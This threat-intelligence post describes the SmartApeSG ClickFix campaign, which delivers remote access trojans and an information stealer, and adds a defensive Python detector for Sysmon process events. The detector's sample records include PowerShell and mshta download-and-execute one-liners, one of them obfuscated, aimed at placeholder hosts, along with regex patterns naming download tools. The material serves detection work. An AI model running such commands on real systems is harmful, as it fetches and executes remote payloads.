Published June 2, 2026
The SmartApeSG threat actor group is running a high-severity social engineering campaign that uses "ClickFix" scripts to compromise Windows environments. Deceptive browser error messages, fake CAPTCHA prompts and fraudulent verification pages persuade users to run malicious scripts themselves, so no exploit is needed and the initial execution comes from the victim's own session. The scripts then stage several high-impact payloads: the Remcos and NetSupport remote access trojans (RATs) and the Stealc v2 information stealer. A successful infection gives the attackers persistent remote control of the host, large-scale credential theft, and a foothold for lateral movement inside enterprise networks.
- Campaign Overview
  - SmartApeSG has resurfaced with a renewed focus on Windows-based enterprise and consumer environments.
  - The campaign relies on social engineering rather than an exploit: because the victim runs the initial script, e-mail gateways and web proxies see only a page visit, and automated perimeter controls are not triggered.
- Attack Vector: ClickFix Mechanics
  - Deceptive interfaces: fraudulent CAPTCHA prompts and fake browser error or verification pages induce the user to act.
  - Manual execution: the page tells the victim to "fix" a supposed error by running a command themselves. In the common ClickFix pattern the page copies the command to the clipboard and instructs the user to paste it into the Win+R dialog or a terminal and press Enter, so the script host is launched from the user's interactive session.
  - Evasion: the scripts use custom obfuscation to hinder detection by signature-based security products.
- Payload Analysis & Impact
  - Malware delivery: the scripts stage Remote Access Trojans (Remcos, NetSupport) and the Stealc v2 information stealer.
  - Remote access: the RATs give the attackers persistent, unauthorized control of the compromised host.
  - Data exfiltration: the stealer component harvests credentials and other sensitive data stored on the host.
- Defensive Strategies
  - Endpoint detection: prioritize EDR/XDR monitoring for script hosts (powershell.exe, mshta.exe, cmd.exe and similar) launched from the user's interactive session with download, hidden-window or encoded-command arguments, and for the post-infection behaviour of the named RATs.
  - User awareness: train staff to recognize and report web pages that ask them to copy, paste or run commands, and to treat any "verification" step that requires a terminal as hostile.
  - Network monitoring: monitor outbound traffic for C2 patterns associated with Remcos, NetSupport and Stealc.
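As an added example (not code from the original page or from any vendor write-up of this campaign), the following Python scores Sysmon Event ID 1 process-creation records against the generic ClickFix execution pattern described above: a script host spawned from the user's interactive session whose command line fetches a second stage, hides its window, bypasses execution policy or carries escape-character obfuscation. The sample records are constructed for illustration; every hostname, path and command line in them is a placeholder and not an indicator attributed to SmartApeSG, and the indicator list and alert threshold are assumptions to be tuned against real telemetry.

```python
"""Score process-creation records for the generic ClickFix execution pattern.

Added example, not code from the page or from any write-up of SmartApeSG.
Input is a list of dicts carrying the Sysmon Event ID 1 fields Image,
ParentImage and CommandLine; SAMPLE_EVENTS below is constructed, and every
hostname and path in it is a placeholder, not a campaign indicator.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Script hosts a pasted ClickFix one-liner is normally executed through.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Parents that mean the user launched the process interactively
# (Win+R and Explorer launches have explorer.exe as the parent).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}

# Command-line indicators (assumed list); each hit adds 2 to the score.
INDICATORS = [
    ("remote_fetch", re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|curl|bitsadmin)\b|https?://", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("encoded_command", re.compile(
        r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("bypass_policy", re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I)),
    ("inline_invoke", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("mshta_url", re.compile(r'mshta(\.exe)?\s+"?https?://', re.I)),
]

# Backticks and carets are the cheapest obfuscation that breaks keyword
# signatures (I`E`X, p^o^w^e^r^s^h^e^l^l); two or more of them add 1.
ESCAPE_CHARS = re.compile(r"[`^]")

ALERT_THRESHOLD = 4  # assumed; an interactive parent alone (2) must not alert


@dataclass
class Finding:
    image: str
    parent: str
    score: int
    reasons: list = field(default_factory=list)


def basename(path: str) -> str:
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> Optional[Finding]:
    """Return a Finding for a script-host launch that looks like ClickFix,
    or None for processes that are not script hosts or score below threshold."""
    image = basename(ev.get("Image", ""))
    if image not in SCRIPT_HOSTS:
        return None
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    f = Finding(image=image, parent=parent, score=0)
    if parent in INTERACTIVE_PARENTS:
        f.score += 2
        f.reasons.append("interactive_parent")
    for name, rx in INDICATORS:
        if rx.search(cmd):
            f.score += 2
            f.reasons.append(name)
    if len(ESCAPE_CHARS.findall(cmd)) >= 2:
        f.score += 1
        f.reasons.append("escape_obfuscation")
    return f if f.score >= ALERT_THRESHOLD else None


def scan(events) -> list:
    """Apply score_event to every record and keep only the alerts."""
    return [f for f in map(score_event, events) if f is not None]


# Constructed sample records; hostnames use .invalid and are placeholders.
SAMPLE_EVENTS = [
    {   # Win+R paste: explorer.exe spawns powershell that fetches and runs a stage
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm http://example.invalid/verify.txt)"',
    },
    {   # Benign scheduled script launched by the service host
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1",
    },
    {   # mshta pulling an HTA straight from a URL, launched from Win+R
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "mshta https://example.invalid/captcha.hta",
    },
    {   # Backtick-obfuscated iex: the keyword regex misses it, the escape count catches it
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell -c \"I`E`X (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\"",
    },
    {   # User simply opened a console from Explorer: interactive parent alone is not enough
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "cmd.exe",
    },
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.score:>2} {f.parent} -> {f.image}: {', '.join(f.reasons)}")
```

Run against the sample set, the scanner alerts on the three ClickFix-shaped launches and stays quiet on the scheduled backup script and on a plain console opened from Explorer. The fourth record is the reason the escape-character heuristic exists: once `iex` is written as I`E`X the keyword regex no longer fires, so a detector that scores only on keywords is exactly what the campaign's custom obfuscation is built to evade. In production this belongs next to the Win+R history in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which records the pasted command even when the process itself exits quickly.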
Related posts
- Cybersecurity News — SmartApeSG Campaign Uses ClickFix Scripts to Infect Windows Hosts With RAT Malware
- bleepingcomputer.com — Hackers hijack thousands of sites for ClickFix and FakeUpdate attacks
- The Register - Security — Five Eyes: Watch out for odd LinkedIn connection requests, China's back on the hunt for state secrets
- techcrunch.com — Chinese spies are using LinkedIn to lure Westerners into sharing sensitive information
- SecurityWeek — Ghost CMS Vulnerability Exploited to Hack Over 700 Websites
- SecurityWeek — Five Eyes: Chinese Spies Target Government, Military Staff With Fake Job Opportunities
- techjacksolutions.com — UNC1069 Targets npm Ecosystem: North Korean Actors Weaponize ClickFix Playbook Against High-Impact Open Source Maintainers